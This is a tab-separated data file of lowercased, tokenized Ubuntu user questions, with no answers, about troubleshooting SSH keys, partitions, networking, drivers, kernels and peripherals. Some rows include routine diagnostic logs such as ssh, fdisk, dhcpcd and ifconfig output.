253923	can you design buttons on a ubuntu/android tablet that is to be used as a virtual keyboard for your desktop ?	running out of buttons after using autohotkey for remapping , i soon did n't have enough keyboard buttons to attach macros or scripts to them , so i 'd have to make new scripts that use the same button . after more scripts , it can be easy to forget which button does what . customizable , expensive , physical keyboards there are companies that provide custom overlays for their own massive , custom keyboards , such as the enterpad , which is $ 300 . there 's the e-inkey keyboard concept . the optimus popularis keyboard , which has customizable oled screens , is $ 1000 ! tablet as a customizable , virtual keyboard with a touchscreen , you could pretty much design whatever virtual keyboard you want , have multiple virtual keyboard layers , and design the buttons to look however you want . could you use an ubuntu tablet as a virtual keyboard for your desktop ? vnc and remote control of desktop there 's remote control of ubuntu with android-vnc-viewer ( http : //www.youtube.com/watch ? v=stkx6qmbgck # t=0m30s ) , but you 're moving a mouse cursor with your fingers , and the interaction is supposedly not as smooth . the newly announced ubuntu for mobile could make controlling an ubuntu desktop more seamless . design your own buttons aside from the scripting that could be behind the buttons ( you would probably use something like autokey ( http : //code.google.com/p/autokey/ ) , a desktop automation utility for linux ) , i 'm not sure what methods and tools that are out there to design your own buttons . does anyone know anything that can help create your own keyboard and buttons ? thanks .
253925	how to safely abort apt-get install ?	i have an apt-get install process that seems to be hopelessly wedged at the processing triggers for python-support step . my inclination is to kill it , but in the past , simply kill-ing an apt-get install process has caused me much grief . ( iirc assorted lock files are left behind , etc . ) is there a safer way to stop this process ?
253926	error : invalid options specification : options.staging.type	i am following the instruction in http : //jujucharms.com/~juju-gui/precise/juju-gui but i am getting the following error . it looks like a string is exepect where a boolean is defined . $ > juju deploy cs : ~juju-gui/precise/juju-gui invalid options specification : options.staging.type : expected 'string ' , got 'boolean ' 2013-02-11 19:31:37,896 error invalid options specification : options.staging.type : expected 'string ' , got 'boolean' how do i fix this ?
253929	is there a linux equivalent to linqpad ?	i 've recently been finding myself writing more sql , on windows with mssql and linqpad and while i want to experiment on ubuntu to get more of a handle on databases and i have no love lost for mssql , i 'll be using mysql i do want to find a linqpad equivalent . what i mean by this in more concrete terms is not the most powerful tool but more of a scratch-pad like linqpad is , where a novice can quickly write down a query and run it to see what happens , also something which is fast to start and run .
253936	replaced windows 7 , but where did my old files go ?	ok , let me start by saying that i know nothing about linux and that i switched because i was sick and tired of windows . so i had windows 7 on my c : drive and i chose to replace it with ubuntu 12.10 . the problem is there i was prepared to have all my data erased from c : drive but now it seems i can find anything at all ! there is no partition . theres nothing . frankly i 'm bummed ! where is my music that i had in my d : drive earlier and the movies in my x : drive ! help ! [ edit ] to all linux/ubuntu newbies , do not do the following : i had windows 7 installed on 'c : ' and other drives that had my own files were 'd : ' and 'x : ' . i downloaded the ubuntu 12.10 iso from the website [ not related : which had a few broken files so i used bit torrent to fix it ] and did a usb boot . i chose the replace windows 7 with ubuntu option . i didnt get any option to select my partition or anything , the thing just rolled and mowed down on everything i had.. follow lucio 's comment to figure out how to do it right . and always have a backup .
253941	how can i get gnome-keyring-daemon to prompt for ssh-key password in the terminal instead of the gui	when accessing an ssh-key with a password for the first time in a gnome session , it 's so much clearer for the password prompt to appear in the terminal i 'm running the ssh command in . instead , though , gnome-keyring-daemon prompts with a gui pop-up that can easily get lost on different workspaces . how can i make gnome-keyring-daemon prompt me in the terminal rather than with a gui ? it should look like this : $ ssh name @ server.com enter password for ssh key `/path/to/my/key.dsa` : this is the prompt that appears in a non-x session , for instance .
253949	how can i avoid having to pair my bluetooth mouse all the time ?	i am dual booting ubuntu and windows 8 . i have a microsoft bluetooth mouse . it is working properly in both oses but i have to pair every time when i switch os . is there any way to use the bluetooth mouse without needing to pair each time ?
253950	how to copy /sda3 to /sda1 ? uuid 's ca n't be similar	/dev/sda is a 400 gig drive . it 's partitions were : /sda1 - windows boot partition ( 100 meg ) ; /sda2 windows `` c : \ '' ( 68 gig ) ; /sda3 is linux boot partition ; /sda5 is /home partition ; /sda6 is linux-swap . /sda1 and /sda2 have been deleted and /sda2 expanded into /sda1 . i want to clone /sda3 to /sda1 and have the 12.04 ( precise pangolin ) know to boot from /sda1 and not from /sda3 . how do i edit both /etc/fstab and grub2 to have proper ( i have no idea how to use words to express this idea ) uuid ? i know that using gparted to `` copy '' /sda3 to /sda1 requires editing to make the copied partition have a uuid that is not a match ( or the same uuid number as ) the original partition ( /sda3 ) . what other steps must i take to not confuse grub2 and the fstab so that they work harmoniously and i do n't harm the os/data/other stuff on the hard drive ? next , i want to shrink /sda1 to 25 gig ( currently 68 gig ) , and continue /sda1 as boot . then i want to use 43 gig from shrinking /sda1 , and add it to the ( to be ) unused /sda3 and then to expand /sda5 into the expanded /sda3 i can not post a screenshot of gparted , so here is fdisk -l in stead : mark @ lexington-19 : ~ $ sudo fdisk -l [ sudo ] password for mark : disk /dev/sda : 400.1 gb , 400088457216 bytes 255 heads , 63 sectors/track , 48641 cylinders , total 781422768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf3e1e104 device boot start end blocks id system /dev/sda1 2048 143570943 71784448 83 linux /dev/sda3 * 143572905 174176729 15301912+ 83 linux /dev/sda4 174176791 781417664 303620437 5 extended /dev/sda5 174176793 764420894 295122051 83 linux /dev/sda6 764420958 781417664 8498353+ 82 linux swap / solaris
253954	ca n't install any software from software center	when i am trying to install a software from software center it show me this : requires installation of untrusted packages the action would require the installation of packages from not authenticated sources .
253955	`` permission denied ( publickey ) . '' error when trying to ssh into server	i am trying to connect to a server via ssh . i am getting the following log from using the command : ssh -vvvt ubuntu @ ec2-176-34-121-133.eu-west-1.compute.amazonaws.com . please could someone help me debug this log as i am getting no where with it . 5742 : ~/.ssh $ ssh -vvvt ubuntu @ ec2-176-34-121-133.eu-west-1.compute.amazonaws.com openssh_6.0p1 debian-3ubuntu1 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to ec2-176-34-121-133.eu-west-1.compute.amazonaws.com [ 176.34.121.133 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/karl/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /home/karl/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/karl/.ssh/id_rsa-cert type -1 debug1 : identity file /home/karl/.ssh/id_dsa type -1 debug1 : identity file /home/karl/.ssh/id_dsa-cert type -1 debug1 : identity file /home/karl/.ssh/id_ecdsa type -1 debug1 : identity file /home/karl/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_6.0p1 debian-3ubuntu1 debug1 : match : openssh_6.0p1 debian-3ubuntu1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.0p1 debian-3ubuntu1 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` ec2-176-34-121-133.eu-west-1.compute.amazonaws.com '' from file `` /home/karl/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/karl/.ssh/known_hosts:3 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 59 : c4:29:87:87:50 : f7 : eb : fb : ea:2a:39:8b:07:1a:33 debug3 : load_hostkeys : loading entries for host `` ec2-176-34-121-133.eu-west-1.compute.amazonaws.com '' from file `` /home/karl/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/karl/.ssh/known_hosts:3 debug3 : load_hostkeys : loaded 1 keys debug3 : load_hostkeys : loading entries for host `` 176.34.121.133 '' from file `` /home/karl/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/karl/.ssh/known_hosts:4 debug3 : load_hostkeys : loaded 1 keys debug1 : host 'ec2-176-34-121-133.eu-west-1.compute.amazonaws.com ' is known and matches the ecdsa host key . debug1 : found key in /home/karl/.ssh/known_hosts:3 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/karl/.ssh/id_rsa ( 0xb7f68a18 ) debug2 : key : /home/karl/.ssh/id_dsa ( ( nil ) ) debug2 : key : /home/karl/.ssh/id_ecdsa ( ( nil ) ) debug1 : authentications that can continue : publickey debug3 : start over , passed a different list publickey debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/karl/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : server accepts key : pkalg ssh-rsa blen 279 debug2 : input_userauth_pk_ok : fp a2:34 : c1 : e2:9c:18 : e3:46:8b:96:46 : f3:59:4b:5f : cc debug3 : sign_and_send_pubkey : rsa a2:34 : c1 : e2:9c:18 : e3:46:8b:96:46 : f3:59:4b:5f : cc debug1 : authentications that can continue : publickey debug1 : trying private key : /home/karl/.ssh/id_dsa debug3 : no such identity : /home/karl/.ssh/id_dsa debug1 : trying private key : /home/karl/.ssh/id_ecdsa debug3 : no such identity : /home/karl/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( publickey ) . 5742 : ~/.ssh $
253963	clipboard manager with `` history paste '' support ?	i am looking for a clipboard manager , but i do n't want one that just keeps a list so i can select an item to bring it to the front of the clipboard , nah , that 's too easy . what i am looking for is a clipboard manager where i can assign say ctrl+shift+1 to paste the first item in the clipboard , ctrl+shift+2 to paste the second item in the clipboard ... ctrl+shift+9 to paste the ninth item in the clipboard ctrl+shift+0 to paste the tenth item in the clipboard why ? as we web developer i am often pasting alternating lines of code ( remember , not all browsers support css3 ! ) , < tr class= '' odd '' > ... < /tr > < tr class= '' even '' > ... < /tr > < tr class= '' odd '' > ... < /tr > < tr class= '' even '' > ... < /tr > so , the ability to just sit there doing ctrl+shift+1 enter ctrl+shift+2 enter would be a huge help , i am using 12.10 with gnome-shell 3.6.2 . i have looked into gpaste and such , but none seem to have this feature .
253967	auto-selected text in a browser address bar	in windows when i click the address bar in chrome or firefox , or the search box in firefox , all existing text is selected automatically and if i type something it is typed in a black text area . but in ubuntu , the text is not selected automatically , and i have to select all and then type . is there any option that fixes this problem ?
253973	depends : exim vs mail-transport-agent	i am creating a .deb installation package for our software , which depends on a valid smtp server being installed . currently the control file states : depends : mail-transport-agent however one debian user complained that the package would n't install , probably because he has exim installed . now i am a little confused . is exim a valid mta ? if so , why does n't it `` provide '' the virtual package mail-transport-agent ? if i edit my control file to state : depends : exim | mail-transport-agent can i assume a working smtp server will be available when the exim package is installed ? or is exim not really a replacement for postfix , sendmail , etc ?
253975	msi mobo built in wifi	i just bought a new computer with the following mobo : msi z77ia-e53 . it has built in wifi but to use it you need to install drivers from a cd , and they are only for windows . i went to the msi uk homepage but i could n't find any linux/ubuntu drivers there either . ( http : //uk.msi.com/product/mb/z77ia-e53.html # / ? div=driver & os=all ) does anyone know how i can find those drivers ? right now i 'm using an external usb-wifi dongle but i would like to switch to the built in wifi asap . thanks for reading ! here are the results from lscpi -nn : 00:00.0 host bridge [ 0600 ] : intel corporation ivy bridge dram controller [ 8086:0150 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation ivy bridge graphics controller [ 8086:0162 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation panther point usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation panther point mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation panther point high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation panther point pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation panther point pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation panther point lpc controller [ 8086:1e44 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation panther point 6 port sata controller [ ahci mode ] [ 8086:1e02 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation panther point smbus controller [ 8086:1e22 ] ( rev 04 ) 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 )
253982	windows wont boot in grub	i have a dualboot with windows xp and ubuntu . but when i try to select xp in the grub menu , it just blinks and returns to the grub menu . any ideas ?
253983	what is the difference between ubuntu server and ubuntu cloud under lxc ?	i want to set up ubuntu lxc containers . is there a practical difference between the /usr/share/lxc/templates/lxc-ubuntu and /usr/share/lxc/templates/lxc-ubuntu-cloud ? i only have a single physical server running 12.04 .
253986	netgear n300 wireless adapter ( wna3100 ) setup question	i have been trying to setup a netgear n300 wireless adapter on my machine running ubuntu 12.04 32-bit , but none of the instructions that i find have worked for me . i am new to linux . i would be happy to supply any information you need to help me . thanks !
253990	what is a activity in kde and what can i do with it ?	in the top right corner of a standard kde/kubuntu installation you 'll see this : but seriously , i seem to be unable to understand what those `` activities '' are and what it would enable me to profit from . it just pops up like an `` add widget '' screen with just four options : new activity - default plasma widgets desktop - is this a bug that it 's called like that ? search and launch - sort of over-spacious netbook interface ? photos activity - i do n't have any pictures local on my machine , useless for me . desktop icons - traditional style desktop-icons-only choosing one of those options seems to create a completely new desktop `` plasma '' . then why is this called activity ? am i missing something ? is this is nifty feature i 've been missing on for a few years now or is this not that exciting ? how do i use this as it 's supposed to work ? googling for what this is supposed to be give me all kind of vague descriptions like this one : no feature defines the kde 4 release series more than activities . at the same time , no feature is so little understood -- fedora even has a package for removing the desktop toolkit , which provides mouse access to activities . but , when you take the time to learn about activities , you 'll find them a natural extension of the desktop metaphor that just might help you to work more efficiently . activities are a super-set of virtual desktops . they do n't replace virtual desktops -- in fact , each activity can have its own set of virtual desktops if you choose . instead , activities are alternative desktops , each of which can have its own wallpaper , icons , and widgets . sorry , but after reading such a vague and impractical story i 'm out . can someone give me an overview of what i can do with it ? i guess this is supposed to provide a way to separate private and business work , but then , how ?
253994	lost data on partition	i 'm totally new on ubuntu . just decided to kick out the horrible windows 8 : so i downloaded the last version of ubuntu available on the web site , tried out the live cd and found it quite interesting . after starting to install i arrived to the part where i could choose and manage the partitions where i wanted to install ubuntu . being new to it decided not to touch where i was n't sure as i did n't want to loose my data partition where i have accumulated my pictures for almost 6 years . so i decided to go back and let the installation do it by itself . there was a warning saying i would lose all my data but i supposed it would be just on the windows partition . after the install finished i started to wonder around my new os and realized that i could n't find my data partition . i guess this is not a new question at all , but i 'm just a bit scared as i do n't want to loose all the data i had . i 've been reading and trying some solutions like mounting the partitions , but it seems that the only partitions i find is one called boot and another called swap along with sda2 which i tried to mount but got the message wrong nfts format . so here is the big question : is there any chance to recover the partition or shall i forget about everything ( my files ) ?
253996	using ncftp or other ftp command-line software to get directories	i 'm transferring files from a ftp client to my ubuntu server using the terminal . i was able to upload a backup of some files that were already zipped but there are some files i need that are in a folder that can not be zipped or archived . with ncftp or other using another way , how can i transfer a folder of files ( and sub-folders ) without having to archived/zipped the folder ? i am unable to do this because the files are on a shared hosting account for a game server and they 're replying to slow while i 'm asking them to archived it .
254001	psx 1.13 on 12.04 64bit	okay so i 've been wanting to get this emulator to run for a while now but i honestly do n't know how or why it wo n't work . i think it might be because it 's a 32bit program trying to run on a 64bit but i 'm not even going to try to sound like i know what i 'm talking about . i downloaded the lasted version which would be psx 1.13 . when i try to run it does nothing okay so i ran it from terminal and got this ./psx : error while loading shared libraries : libgtkglext-x11-1.0.so.0 : wrong elf class : elfclass64 i would much rather prefer this emulator over pcsxr or epsxe so is there a way to use this ? ? i 'm open to any ideas thanks , also i looked for this libgtkglext-x11 in synaptics and did n't find it also i googled it and came up with nothing strangely enough
254003	bind super + numpad 4	i 'm running ubuntu 12.04 and would like to rebind super + num4 to `` put window on the left side of the screen '' based upon this question , i was able to setup my binding using the compizconf grid settings , however the default hotkey to for the 4th launcher icon is taking precedence over my binding . how can i remove default ubiquity hotkeys so that they do not interfere with my own ?
254004	random black screens , black screens after log out , and random black flashes on boot . please help	okay , so here 's the deal . i had ubuntu 12.10 on my asus zenbook ux32a . i heard that ubuntu 12.04 lts more reliable , and stable , so i decided to get that . i did a fresh install of ubuntu 12.04 lts . now , when i boot the computer , first of all the ubuntu logo does n't show up , it 's just a purple screen . then the screen flashes , and the logo shows with the purple screen . then it flashes again , and takes me to the login screen where i hear the drums , and it flashes a few more times after that . i login , and it flashes again . mind you , this happens every time i boot up my laptop , and it happens at probably the same times . not only that , if i try to logout , it logs me out , but the screen goes black , and i am not able to log back in . i have to force shutdown ( hold power button ) my laptop , and boot it up again . today , i was trying to go into the display application in the system settings , once i clicked on it , my screen went black , and i had to boot up my laptop again . i also tried to change the resolution , and the screen went black . also , i ca n't right click , i have to double tap my touch pad like a mac . i really do n't know what is going on . ubuntu 12.10 on the same laptop worked relatively well . why not 12.04 lts which is supposed to be more stable ? please help , i need this laptop for a lot of things and ca n't afford it to be glitching out on me . if you need any more information , i can tell you . thanks
254012	just installed ubuntu 12.10 and my usb mouse & keyboard wo n't work	i was trying to install ubuntu 12.10 from a live cd and i was n't able to get it to recognize either my keyboard ( c.y.b.o.r.g v5 ) or my mouse ( r.a.t 7 ) . i eventually gave up but later on i was able to use an old keyboard that uses a serial port instead of a usb ( which works ) . i was then able to install the os but my mouse still wo n't work . i am unable to navigate with just the keyboard so i really do n't know what to do .
254014	skype is saying i am already connected . i am not . help ?	can you help me ? i am using ubuntu 12.04 and skype is saying i am already connected but i am not . what can i do ?
254017	hdhomerun dual and kaffeine	i am trying to get hdhomerun dual to work with kaffeine . i installed dvb per the instructions here : http : //sourceforge.net/apps/trac/dvbhdhomerun/wiki/ubuntupackages but at the end , when i install , i get the following error : setting up dvbhdhomerun-utils ( 0.0.13-1 ) ... start : job failed to start invoke-rc.d : initscript dvbhdhomerun-utils , action `` start '' failed . dpkg : error processing dvbhdhomerun-utils ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : dvbhdhomerun-utils e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've been searching and i believe it has to do with dvb_core , but i cant seem to find a solution . i 'm running 12.10 . truth be told , outside of excel , my last bout with programming was basic ... many , many ( many ) years ago , so i 'm a bit of a noob with this . thanks for any help
254023	internet connection : connected only when detach/attach the wire again	i just started my adventure with linux . obviously had many issues already , but get to manage it . one that bother me a little though i have found the temporary workoround is my network connection . my topology is : nat- > modem- > router ( netgear 192.168.1.1 ) - > tplink ( 192.168.0.1 ) tplink gives me the wireless network at home . but i have also ubuntu 12.10 connected to tplink through wire . other machines ( wireless ) have ip addresses like 192.168.0.100 , ubuntu ( wire ) has eth0 configured as address 192.168.0.101 netmask 255.255.255.0 gw 192.168.0.1 it works fine , but after restart or shutdown of system i get disconnected . ping 192.168.0.1 gives `` no network '' error i can get connected again if i get wire off , wait a while and plug it again . sometimes it works instantaneously , but sometimes not , sometimes i get ip 192.168.1.5 as if the ubuntu was connected directly to the router ( netgear .1.1 ) but it is connected to the tplink ( .0.1 ) - > how is this possible ? ? ? i have seen a post suggesting it might be dhcp , so installed dhcpcd . here is the result of running it while being disconected . [ sudo ] password for user : info , eth0 : dhcpcd 3.2.3 starting info , eth0 : hardware address = d4:3d:7e:4b:47 : dc info , eth0 : duid = 00:01:00:01:18 : ab : f5 : fd : d4:3d:7e:4b:47 : dc info , eth0 : broadcasting for a lease debug , eth0 : sending dhcp_discover with xid 0x105db75d debug , eth0 : waiting for 20 seconds debug , eth0 : sending dhcp_discover with xid 0x105db75d debug , eth0 : sending dhcp_discover with xid 0x105db75d debug , eth0 : sending dhcp_discover with xid 0x105db75d debug , eth0 : sending dhcp_discover with xid 0x105db75d debug , eth0 : sending dhcp_discover with xid 0x105db75d debug , eth0 : sending dhcp_discover with xid 0x105db75d err , eth0 : timed out info , eth0 : trying to use old lease in `/var/lib/dhcpcd/dhcpcd-eth0.info' info , eth0 : probing for an ipv4ll address debug , eth0 : sending arp probe # 1 debug , eth0 : sending arp probe # 2 debug , eth0 : sending arp probe # 3 debug , eth0 : sending arp claim # 1 debug , eth0 : sending arp claim # 2 warn , eth0 : using ipv4ll address 169.254.146.212 info , eth0 : adding ip address 169.254.146.212/16 debug , eth0 : no dns information to write debug , eth0 : writing /var/lib/dhcpcd/dhcpcd-eth0.info debug , eth0 : exec `` /etc/dhcpcd.sh '' `` /var/lib/dhcpcd/dhcpcd-eth0.info '' `` new '' debug , eth0 : forking to background info , eth0 : exiting user @ cmp : ~ $ dhcpcd.sh : interface eth0 has been configured with new ip=169.254.146.212 it did n't work , i was given the ip 169.254.146.212 ( ifconfig , below ) but had no network connection . again , i connected again by taking wire off , wait a while and plug it again . ifconfig eth0 link encap : ethernet hwaddr b4:1u:2b:4b:41 : c7 inet addr:169.254.146.212 bcast:169.254.255.255 mask:255.255.0.0 inet6 addr : fe91 : :d62d:7eff : ft4b:54hc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:138 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:35345 ( 35.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:80 errors:0 dropped:0 overruns:0 frame:0 tx packets:80 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6432 ( 6.4 kb ) tx bytes:6432 ( 6.4 kb ) has anyone experienced such a thing ?
254030	azure alternative for ubuntu	the end user can store his/her windows configurations to azure , thus in case he formatted his pc windows will restore the old configurations from the cloud . is there any solution alternative for ubuntu os ? ps i 'm using mozilla sync for my firefox , it works fine and i wish to find a similar to it for whole operating system ( i want my ubuntu configurations at work similar to my ubuntu at home )
254031	change openvpn client 's default route	when setting up a test openvpn client on ubuntu ( using this guide ) , the client sets a route which tunnels all traffic through the vpn . for example , when i connect to the vpn from ubuntu , this is what netstat -nr shows : 0.0.0.0 10.8.0.9 0.0.0.0 ug 0 0 0 tun0 10.8.0.1 10.8.0.9 255.255.255.255 ugh 0 0 0 tun0 10.8.0.9 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 tun0 ... i believe the first line is tunnelling everything through the vpn , correct ? when i compare this to the output of the same command from my osx machine : 10.8.0.1/32 10.8.0.5 ugsc 1 0 tun0 10.8.0.5 10.8.0.6 uh 2 33 tun0 ... i do n't have that rule . is there a way for me to push a command to delete that route from the client ? what are my other options here ?
254037	how do i manually install linux backports	i just installed ubuntu server 12.10 and i am missing the drivers for my ethernet adapter . i have seen this is a common problem for my controller ( ar8161 ) i have downloaded the package linux-backports-modules-cw-3.6-3.5.0-17-generic_3.5.0-17.1_amd64.deb on a working machine . how do i go about installing this package on my ubuntu machine that does not have a network connection ?
254042	how can i revert to the previous kernel version w/out dependency issues ?	since ubuntu updated my install to 3.2.0-37-generic , my laptop fan constantly runs . i never had this issue with the previous kernel versions . to fix this problem , i would like to revert back to the previous kernel version . yet when i use grub and select one of the previous ones , i now have a red error display showing in the panel . the error message makes it sound like there is now some kind of dependency issue/s because i 'm using the `` old '' kernel ( it 's only two versions back ) . how can i revert back to using one of the older kernels and meet all dependencies ( not have an error message ) ? i 'm using fully up to date 12.04 . e : could not open file /var/lib/synaptic/preferences - open ( 13 : permission denied )
254045	brother mfc-240c ubuntu 12.04.1	brother mfc-240c not scanning to computer . test page and a document page printed fine . the photo copy part works ok to .
